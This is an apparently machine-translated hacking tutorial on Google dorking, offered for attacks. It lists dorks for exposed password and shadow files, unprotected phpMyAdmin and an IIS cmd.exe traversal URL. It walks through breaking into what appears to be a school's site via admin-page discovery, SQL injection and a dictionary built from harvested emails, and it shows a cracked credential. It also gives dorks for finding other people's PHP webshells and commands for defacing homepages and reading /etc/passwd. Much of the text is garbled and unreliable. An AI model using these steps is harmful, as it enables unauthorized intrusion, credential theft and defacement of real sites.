Google Hacking is actually not a new thing. At that time, Google Hacking did not pay much attention to this technology and thought that webshell is not of much practical use. Google Hacking is actually not
So simple...
Simple implementation of Google Hacking
Some Google syntaxes can be used to provide us with more information (and, of course, to those who are used to attack more people they want .), the following describes some common syntaxes.
Intext:
This means that a character in the body of a webpage is used as a search condition. For example, if you enter intext in Google, the system will return all webpages whose body contains "".
. Allintext: The usage is similar to that of intext.
Intitle:
Similar to the intext above, search for any characters in the webpage title that we are looking for. For example, search: intitle: Security angel. The system will return all web pages whose titles contain "Security Angel ".
Page. Similarly, allintitle: is similar to intitle.
Cache:
Search for the cache of some content in Google, and sometimes you may find some good stuff.
Define:
Search for the definition of a word. Search: Define: hacker. The definition of hacker is returned.
Filetype:
I would like to recommend that you search for a specified type of files, for example, input
: Filetype: Doc. All file URLs ending with Doc will be returned. Of course, if you are looking for. Bak,. mdb, or. Inc, you can also obtain more information.
Info:
Query the basic information of a specified site.
Inurl:
Search whether the specified character exists in the URL. For example, if you enter inurl: Admin, N Connections similar to the following are returned: success.
Link:
For example, search: inurl: www.4ngel.net can return all URLs connected to www.4ngel.net.
Site:
This is also useful. For example, site: www.4ngel.net. will return all URLs related to this site of 4ngel.net.
By the way, some * operators are also very useful:
+ Display columns that may be ignored by Google as the query range
-Ignore a word
~ Word of consent
. Single wildcard
* Wildcard, which can represent multiple letters
"" Precise Query
Let's start with the actual application.
The following content is searched on Google. For a tested attacker, he may be most interested in the password file. However, Google often has powerful search capabilities.
Expose some sensitive information to them. Use Google to search for the following content:
Intitle: "index of" etc
Intitle: "index of". sh_history
Intitle: "index of". bash_history
Intitle: "index of" passwd
Intitle: "index of" People. lst
Intitle: "index of" PWD. DB
Intitle: "index of" etc/shadow
Intitle: "index of" spwd
Intitle: "index of" Master. passwd
Intitle: "index of" htpasswd
"#-FrontPage-" inurl: Service. pwd
Sometimes some important password files are exposed to the network without protection for various reasons. If they are obtained by someone with ulterior motives, the harm is very great.
You can also use Google to search for vulnerabilitiesProgramFor example, zeroboard found files some time ago.CodeAttackers can use Google to find websites that use this program.
Point:
Intext: zeroboard filetype: PHP
Or use:
Inurlutlogin. php? _ Zb_path = site:. JP
To find the page we need. phpMyAdmin is a set of powerful database * software. Due to misconfiguration of some sites, we can directly perform * on phpMyAdmin without using the password. we can use Google to search for the program URLs with such vulnerabilities:
Intitle: phpMyAdmin intext: Create new database
Also remember http://www.xxx.com/_vti_bin/..%5... ystem32/cmd.exe? Dir? Search by Google. You may find many more
Antique machines. We can also use this to find pages with other CGI vulnerabilities.
Allinurl: winnt system32
As mentioned above, Google can be used to search for database files. Some syntaxes can be used to precisely search for more information (Access database, MSSQL, MySQL Connection Files, etc ). for example:
Allinurl: BBS data
Filetype: MDB inurl: Database
Filetype: Inc Conn
Inurl: Data filetype: MDB
Intitle: "index of" data // This often occurs on Apache + Win32 servers with incorrect configuration. Like the above principle, we can also use Google to find the background.
Google can be used to collect and penetrate information on a site. Next we will use Google to perform a test on a specific site.
First, use Google to check some basic information about the site (some details are omitted ):
Site: xxxx.com
Find the domain names of several school departments from the returned information:
Http://a1.xxxx.com
Http://a2.xxxx.com
Http://a3.xxxx.com
Http://a4.xxxx.com
By the way, the ping should be performed on different servers. Schools generally have a lot of good information. First, check whether there are any good things.
Site: xxxx.com filetype: Doc
Get n good doc files.
First look for the website management background address:
Site: xxxx.com intext: Management
Site: xxxx.com inurl: Login
Site: xxxx.com intitle: Management
More than 2 Admin backend addresses:
Http://a2.xxxx.com/sys/admin_login.asp
Http://a3.xxxx.com: 88/_ admin/login_in.asp
pretty good. Check out what programs are running on the server:
site: a2.xxxx.com filetype: ASP
site: a2.xxxx.com filetype: php
site: a2.xxxx.com filetype: aspx
site: a3.xxxx.com filetype: ASP
site :.......
......
the A2 server uses IIS, the ASP full-Site program, and a PHP Forum.
the A3 server is also IIS, aspx, and ASP. Web programs should all be developed by themselves. If you have a forum, you can see if you can meet any public FTP account or something:
site: a2.xxxx.com intext: ftp: // *: *
you can't find anything valuable. See if there is any Upload Vulnerability:
site: a2.xxxx.com inurl: file
site: a3.xxxx.com inurl: Load
A file upload page is found on A2:
http://a2.xxxx.com/sys/uploadfile.asp
with ie looked at, no access permission. Try the injection.
site: a2.xxxx.com filetype: ASP
the address of n asp pages is obtained. Let the software do the physical activity. This program does not prevent injection, although the dbowner permission is not high, it is enough. Back A shell doesn't like it very much, and it seems that the database is not small. The password of the web administrator is cracked and then the MD5 is encrypted. Generally, the passwords of school sites are relatively regular, and they are usually domain name + phone deformation. Use Google to fix it.
site: xxxx.com // obtain N second-level domain names.
site: xxxx.com intext: * @ xxxx.com // obtain n email addresses,
site: xxxx.com intext: Phone/n
you can create a dictionary of information about the owner name of the email address and run it slowly. After a while, I ran out of four accounts, two of which were from the student union, one administrator, and one possibly from the teacher's account. Log on to the website:
name: website administrator
pass: a2xxxx7619 // Let's go, that is, the domain name + 4 numbers
how to raise the right does not belong to the access discussed in this article.
During this time, I looked at some Google hack research sites outside China. In fact, they are almost all about the flexible use of some basic syntaxes, or working with a script vulnerability mainly depends on my flexible thinking. There are not many defense measures for Google hack in foreign countries, so we are still waiting till now, so don't try to crack it. Some Web administrators running Apache on Windows should pay more attention to this aspect. An intitle: Index of will almost all come out.
1. Search for webshell using PHP
Intitle: "php shell *" "enable stderr" filetype: PHP
(Note: intitle-the webpage title enable stderr-UNIX standard output and the abbreviated filetype-file type for standard errors ). In the search results, you can find many
The Web shell of the command line. If the phpshell you find won't be used, if you are not familiar with Unix, you can directly look at the list, which is not detailed here and has a lot of useful value. Description
Some of the phpshells we found here use Unix commands, all of which are functions called by the system (in fact, Baidu and other search engines can be used, only fill in different search content ). This phpwebshell can directly echo (commonly used Unix Commands ). One sentence:
Echo "summon"> index. jsp
Now let's look at the homepage and change it to "summon.
We can also use wget to upload a file (for example, the leaf you want to replace ). Execute Command and enter cat File> index.html or echo ""> File
Echo "test"> File
In this way, the site homepage is replaced successfully. You can also
Uname-A; CAT/etc/passwd
However, you must note that some webshell programs cannot be executed due to problems,
2. Search for Inc sensitive information
In the Google search box, enter:
Code:
. Org filetype: Inc